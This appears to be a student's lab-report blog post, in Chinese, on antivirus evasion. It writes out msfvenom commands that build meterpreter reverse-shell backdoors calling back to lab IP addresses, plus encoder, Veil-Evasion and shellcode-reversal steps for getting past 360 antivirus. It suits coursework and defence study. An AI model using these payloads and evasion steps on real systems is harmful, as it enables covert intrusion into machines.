20145337马月

  博客园  :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

20145337《网络对抗技术》免杀原理与实践


基础问题回答

  1. 杀软是如何检测出恶意代码的?
    - 基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测
  2. 免杀是做什么?
    - 即使病毒木马避免被杀软查杀的技术,如改变特征码、改变行为等
  3. 免杀的基本方法有哪些?
    - 加冷门壳
    - 加壳改壳
    - 加花指令
    - 改程序入口点

实践总结与体会

  1. 通过这次实践,了解了免杀的基本原理。
  2. 实践之前,对于恶意代码及木马程序的了解过分依赖杀毒软件,但是并不知道其中杀毒、检测木马的原理。
  3. 瞒过杀毒软件很容易,略施小计就能成功,要时刻警惕电脑和个人信息的安全。

离实战还缺些什么技术?

  1. 对生成后门的这些软件、平台使用不够熟练

  2. 对C语言、汇编工具的了解

  3. 实战中如何在靶机上注入后门程序并运行

实践过程

使用msf生成后门程序的检测

  • 原始文件,检出率56%(22/39)

Msfvenom编码器

  • 使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.59.128 LPORT=323 -f exe > firsttest.exe编码一次后,检出率没变

  • 编码多次,检出率51%(20/39)降低了一点

Veil-Evasion生成可执行文件

  1. 输入veil-evasion打开软件

  2. 使用use查看有效载荷

  3. 大家都用python,我决定换一个,49创建一个ruby/meterpreter/rev_tcp可执行载荷

  4. 设定 LHOST=192.168.57.128,输入generate生成载荷

  5. 创建载荷,显示路径

  • 检出率23%(9/39)降低了不少

  • 360安全卫士没什么用,360杀毒可以检测到

C语言 调用Shellcord

  1. 先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.75.128 LPORT=3026 -f c生成一个c语言格式的Shellcode数组:

  2. 用该数组编写程序

  3. 编译后生成可执行文件 exp3.exe

  4. 在kali下打开msf监听进程,在靶机上运行可执行文件

  5. 被360发现了,还需要改进

修改之逆序

  • 在原有的代码基础上,稍作修改,首尾交换。再次在kali下打开msf监听进程,在靶机上运行可执行文件
  • 成功
posted on 2017-03-26 18:21  20145337马月  阅读(254)  评论(0编辑  收藏  举报